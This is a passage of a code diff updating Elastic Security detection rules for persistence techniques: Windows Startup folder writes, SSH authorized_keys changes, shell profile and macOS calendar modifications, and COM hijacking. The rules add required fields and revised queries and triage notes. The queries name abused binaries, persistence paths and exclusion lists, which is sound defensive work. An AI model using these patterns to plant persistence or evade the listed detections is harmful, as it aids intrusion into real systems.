"231876e7-4d1f-4d63-a47c-47dd1acdc1cb", "severity": "medium", @@ -54,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_shell_profile_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_shell_profile_modification.json index 680934896128c..68781de47f191 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_shell_profile_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_shell_profile_modification.json @@ -18,6 +18,33 @@ "references": [ "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e6c1a552-7776-44ad-ae0f-8746cc07773c", "severity": "medium", @@ -55,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ssh_authorized_keys_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ssh_authorized_keys_modification.json index fc49e19895101..ce7e7dd280eb9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ssh_authorized_keys_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ssh_authorized_keys_modification.json @@ -12,6 +12,28 @@ "license": "Elastic License v2", "name": "SSH Authorized Keys File Modification", "query": "event.category:file and event.type:(change or creation) and \n file.name:(\"authorized_keys\" or \"authorized_keys2\") and \n not process.executable:\n (/Library/Developer/CommandLineTools/usr/bin/git or \n /usr/local/Cellar/maven/*/libexec/bin/mvn or \n /Library/Java/JavaVirtualMachines/jdk*.jdk/Contents/Home/bin/java or \n /usr/bin/vim or \n /usr/local/Cellar/coreutils/*/bin/gcat or \n /usr/bin/bsdtar or\n /usr/bin/nautilus or \n /usr/bin/scp or\n /usr/bin/touch or \n /var/lib/docker/* or\n /usr/bin/google_guest_agent)\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f", "severity": "medium", @@ -49,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_file_written_by_suspicious_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_file_written_by_suspicious_process.json index 4726af49b501f..e572135fbf3ff 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_file_written_by_suspicious_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_file_written_by_suspicious_process.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Persistence by a Suspicious Process", - "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account\nlogon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation, \nverify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\", \n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account\nlogon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation,\nverify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "file where event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "440e2db4-bc7f-4c96-a068-65b78da59bde", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_file_written_by_unsigned_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_file_written_by_unsigned_process.json index a6b891b446d10..8879d753f8ede 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_file_written_by_unsigned_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_file_written_by_unsigned_process.json @@ -12,6 +12,43 @@ "name": "Startup Folder Persistence via Unsigned Process", "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account\nlogon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based\non new software installations, patches, or any kind of network administrator related activity. Before entering further\ninvestigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=5s\n [process where event.type in (\"start\", \"process_started\") and process.code_signature.trusted == false and\n /* suspicious paths can be added here */\n process.executable : (\"C:\\\\Users\\\\*.exe\", \n \"C:\\\\ProgramData\\\\*.exe\", \n \"C:\\\\Windows\\\\Temp\\\\*.exe\", \n \"C:\\\\Windows\\\\Tasks\\\\*.exe\", \n \"C:\\\\Intel\\\\*.exe\", \n \"C:\\\\PerfLogs\\\\*.exe\")\n ]\n [file where event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\", \n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\")\n ]\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], "risk_score": 41, "rule_id": "2fba96c0-ade5-4bce-b92f-a5df2509da3f", "severity": "medium", @@ -47,5 +84,5 @@ } ], "type": "eql", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_scripts.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_scripts.json index 477219cf010bf..d43fbf0049438 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_scripts.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_scripts.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistent Scripts in the Startup Directory", - "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account\nlogon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n \n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\", \n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\", \n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\", \n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\", \n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", + "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account\nlogon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "file where event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_calendar_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_calendar_modification.json index 97a3de8f4060d..2607dbaae4ff3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_calendar_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_calendar_modification.json @@ -14,12 +14,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Calendar File Modification", - "query": "event.category:file and event.action:modification and\n file.path:/Users/*/Library/Calendars/*.calendar/Events/*.ics and\n process.executable:\n (* and not \n (\n /System/Library/* or \n /System/Applications/Calendar.app/Contents/MacOS/* or \n /usr/libexec/xpcproxy or \n /sbin/launchd or \n /Applications/*\n )\n )\n", + "query": "event.category:file and event.action:modification and\n file.path:/Users/*/Library/Calendars/*.calendar/Events/*.ics and\n process.executable:\n (* and not\n (\n /System/Library/* or\n /System/Applications/Calendar.app/Contents/MacOS/* or\n /System/Applications/Mail.app/Contents/MacOS/Mail or\n /usr/libexec/xpcproxy or\n /sbin/launchd or\n /Applications/*\n )\n )\n", "references": [ "https://labs.f-secure.com/blog/operationalising-calendar-alerts-persistence-on-macos", "https://github.com/FSecureLABS/CalendarPersist", "https://github.com/D00MFist/PersistentJXA/blob/master/CalendarPersist.js" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51", "severity": "medium", @@ -49,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_com_hijack_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_com_hijack_registry.json index bb31786d8fb91..68361ed513c63 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_com_hijack_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_com_hijack_registry.json @@ -10,13 +10,41 @@ "language": "eql", "license": "Elastic License v2", "name": "Component Object Model Hijacking", - "note": "## Triage and analysis\n\n### Investigating Component Object Model Hijacking\n\nAdversaries can insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means of persistence.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file referenced in the registry and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Some Microsoft executables will reference the LocalServer32 registry key value for the location of external COM objects.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "registry where\n (registry.path : \"HK*}\\\\InprocServer32\\\\\" and registry.data.strings: (\"scrobj.dll\", \"C:\\\\*\\\\scrobj.dll\") and\n not registry.path : \"*\\\\{06290BD*-48AA-11D2-8432-006008C3FBFC}\\\\*\") \n or\n /* in general COM Registry changes on Users Hive is less noisy and worth alerting */\n (registry.path : (\"HKEY_USERS\\\\*Classes\\\\*\\\\InprocServer32\\\\\",\n \"HKEY_USERS\\\\*Classes\\\\*\\\\LocalServer32\\\\\",\n \"HKEY_USERS\\\\*Classes\\\\*\\\\DelegateExecute\\\\\", \n \"HKEY_USERS\\\\*Classes\\\\*\\\\TreatAs\\\\\", \n \"HKEY_USERS\\\\*Classes\\\\CLSID\\\\*\\\\ScriptletURL\\\\\") and\n not (process.executable : \"?:\\\\Program Files*\\\\Veeam\\\\Backup and Replication\\\\Console\\\\veeam.backup.shell.exe\" and\n registry.path : \"HKEY_USERS\\\\S-1-5-21-*_Classes\\\\CLSID\\\\*\\\\LocalServer32\\\\\") and\n /* not necessary but good for filtering privileged installations */\n user.domain != \"NT AUTHORITY\"\n ) and\n /* removes false-positives generated by OneDrive and Teams */\n not process.name : (\"OneDrive.exe\",\"OneDriveSetup.exe\",\"FileSyncConfig.exe\",\"Teams.exe\") and\n /* Teams DLL loaded by regsvr */\n not (process.name: \"regsvr32.exe\" and\n registry.data.strings : \"*Microsoft.Teams.*.dll\")\n", + "note": "## Triage and analysis\n\n### Investigating Component Object Model Hijacking\n\nAdversaries can insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means of persistence.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file referenced in the 